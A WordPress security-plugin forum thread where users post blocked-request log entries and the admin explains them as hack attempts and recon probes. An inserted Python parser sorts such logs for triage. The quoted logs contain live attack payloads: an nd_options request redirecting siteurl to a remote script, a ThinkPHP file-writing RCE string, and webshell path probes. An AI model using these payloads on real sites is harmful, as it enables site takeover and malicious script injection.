Security Log Event Codes
Tagged: Event Codes, Security Log
- This topic has 90 replies, 22 voices, and was last updated 1 year, 2 months ago by
XavierX.
Bub
Participant
Done and done…. Thanks. This topic should now be closed.
Bub
Participant
Again, thanks.
sergeykar
Participant
I have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing its job – however is there a weakness this attempt is trying to exploit?

[403 GET Request: 06.08.2019 - 10:15]
BPS: 3.5
WP: 5.2.2
Event Code: WPADMIN-SBR
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: 159.69.154.78
Host Name: static.78.154.69.159.clients.your-server.de
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP:
HTTP_FORWARDED:
HTTP_X_FORWARDED_FOR:
HTTP_X_CLUSTER_CLIENT_IP:
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option]
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
AITpro Admin
Keymaster
This is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code. To check if your website is hacked do the steps below:
1. Go to your website’s home page.
2. Right mouse click and click View page source (Google Chrome) or a similar command for other Browsers.
3. Use your Browser’s Find… command (Google Chrome – located under settings > Find…) and enter this search string: nd_options
4. If you see/find Source Code that looks like this below then your website is hacked.
5. Let me know if your Browser Find/Search finds any search results or not.

httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(,
httx://expat.ca/jfjvc.php,
httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option],
httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
Chris Moon
Participant
Found this in my Security Log and not sure what it means:

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla

[403 GET Request: September 19, 2020 - 23:57]
BPS Pro: 14.8
WP: 5.5.1
Event Code: PFWR-PSBR-HPRA
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: ns4.transcomag.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js
QUERY_STRING:
HTTP_USER_AGENT: Mozilla
AITpro Admin
Keymaster
@ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities. The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder. So these recons/searches were blocked by the BPS Pro Plugin Firewall.
Chris Moon
Participant
Thanks Ed, that’s reassuring.
bataraha
Participant
Thanks for confirming the solution. Also we are trying several different methods to try and get the exact solution that is needed in Phase 2 Security Log Solution Targeting on the frontend of the site so that it is logged with the exact solution in the Security Log, but we keep running into a website performance problem. A website performance decrease of even .1 (point 1) seconds is not acceptable so it is looking like the backend troubleshooting tool is going to be the only way to go.
AITpro Admin
Keymaster
@ bataraha – BPS does not cause any website performance slowness and can actually speed up website performance.
Max Parker
Participant
interesting information
meets korun
Participant
thanks
Sanjeev
Participant
If the plugin isn’t installed, treat any requests related to it as potential hacker activity. No need to engage; simply ignore as it’s unrelated to your site’s setup.
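
Added example (not part of any post in this thread, and not BPS code): a Python parser for Security Log entries in the format pasted above, applying the triage described in the replies by separating blocked probes for plugins that are not installed from blocked requests to plugins that are. The installed-plugin set, the verdict names and the sample host name are assumptions made for the example.

```python
import re
from collections import Counter
# Field labels as they appear in the log entries quoted in this thread.
LABELS = ("BPS Pro", "BPS", "WP", "Event Code", "Solution", "REMOTE_ADDR",
          "Host Name", "SERVER_PROTOCOL", "HTTP_CLIENT_IP", "HTTP_FORWARDED",
          "HTTP_X_FORWARDED_FOR", "HTTP_X_CLUSTER_CLIENT_IP", "REQUEST_METHOD",
          "HTTP_REFERER", "REQUEST_URI", "QUERY_STRING", "HTTP_USER_AGENT",
          "REQUEST BODY")
HEAD = re.compile(r"\[(\d{3}) (\w+) Request: ([^\]]*)\]")
FIELD = re.compile(r"\b(" + "|".join(map(re.escape, LABELS)) + r"):")
PLUGIN = re.compile(r"^/wp-content/plugins/([^/?#]+)/")

def parse_entries(text):
    """Split a log (one field per line, or flattened onto one line) into dicts."""
    heads = list(HEAD.finditer(text))
    entries = []
    for head, nxt in zip(heads, heads[1:] + [None]):
        body = text[head.end():nxt.start() if nxt else len(text)]
        parts = FIELD.split(body)  # [prefix, label, value, label, value, ...]
        entry = {"status": head.group(1), "when": head.group(3)}
        for label, value in zip(parts[1::2], parts[2::2]):
            # First occurrence wins: later fields hold client-supplied text.
            entry.setdefault(label, value.strip())
        entries.append(entry)
    return entries

def triage(text, installed):
    """Count blocked plugin-path requests by (verdict, plugin slug, event code)."""
    counts = Counter()
    for e in parse_entries(text):
        m = PLUGIN.match(e.get("REQUEST_URI", ""))
        if m:
            known = m.group(1) in installed
            verdict = "installed-review" if known else "not-installed-recon"
            counts[(verdict, m.group(1), e.get("Event Code"))] += 1
    return counts

# Constructed sample, flattened like the pasted logs; host name is a placeholder.
ENTRY = ("[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 "
         "Event Code: {code} REMOTE_ADDR: GDPR Compliance On "
         "Host Name: scanner.example.net REQUEST_METHOD: GET HTTP_REFERER: "
         "REQUEST_URI: {uri} QUERY_STRING: HTTP_USER_AGENT: Mozilla ")
SAMPLE = "".join(ENTRY.format(code=c, uri=u) for c, u in [
    ("PFWR-PSBR-HPRA", "/wp-content/plugins/wp-file-manager/lib/files/upload.php"),
    ("PFWR-PSBR-HPRA", "/wp-content/plugins/wp-file-manager/lib/files/x.php"),
    ("PFWR-PSBR-HPRA", "/wp-content/plugins/quiz-master-next/js/admin.js"),
    ("WPADMIN-SBR", "/wp-admin/admin-ajax.php")])

if __name__ == "__main__":
    for key, n in triage(SAMPLE, {"quiz-master-next"}).items():  # assumed install list
        print(n, *key)
```

Entries that do not target /wp-content/plugins/ (such as the WPADMIN-SBR one) are parsed but left out of the plugin counts.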
AITpro Admin
Keymaster
@ Samx – BPS is a WordPress security plugin for website security.
XavierX
Participant
Hi, I was recently blocked from my own site when editing my homepage – I was doing multiple image changes and then checking my frontend to see the updates. I was editing the same page for at least 1 hour and just swapping out images to try in the page content. I was blocked on my normal IP address (I then used a VPN to get access to my site again, which was eventually blocked after further edits to my homepage).
Also, while looking through the logs, I noticed an alert for Wordfence, so I’ve added that log too. There are multiple logs for both issues, but I’ve just included one example of each.
Many thanks!

[403 POST Request: 11 July 2024 - 04:38]
BPS: 6.9
WP: 6.5.5
Event Code: WPADMIN-SBR
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: 45.133.172.61
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: POST
HTTP_REFERER: https://www.casinosetc.co.uk/wp-admin/post.php?post=490&action=edit
REQUEST_URI: /wp-admin/admin-ajax.php
QUERY_STRING:
HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 OPR/111.0.0.0
REQUEST BODY: BPS Security Log option set to: Do Not Log POST Request Body Data

[403 GET Request: 11 July 2024 - 12:53]
BPS: 6.9
WP: 6.5.5
Event Code: WPADMIN-SBR
Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/
REMOTE_ADDR: GDPR Compliance On
Host Name: uk8.wpx.net
SERVER_PROTOCOL: HTTP/1.1
HTTP_CLIENT_IP: GDPR Compliance On
HTTP_FORWARDED: GDPR Compliance On
HTTP_X_FORWARDED_FOR: GDPR Compliance On
HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On
REQUEST_METHOD: GET
HTTP_REFERER:
REQUEST_URI: /wp-admin/admin-ajax.php?action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=e55fbca9df22a8a00b98fb953154be23&signature=3cc1f32ec9dd175593e7470d6457c83a4bebcea93226b7635fff1b8c50ba1f3f
QUERY_STRING: action=wordfence_doScan&isFork=0&scanMode=quick&cronKey=e55fbca9df22a8a00b98fb953154be23&signature=3cc1f32ec9dd175593e7470d6457c83a4bebcea93226b7635fff1b8c50ba1f3f
HTTP_USER_AGENT: WordPress/6.5.5; https://www.casinosetc.co.uk
AITpro Admin
Keymaster
BPS does not block by IP address, but Wordfence does.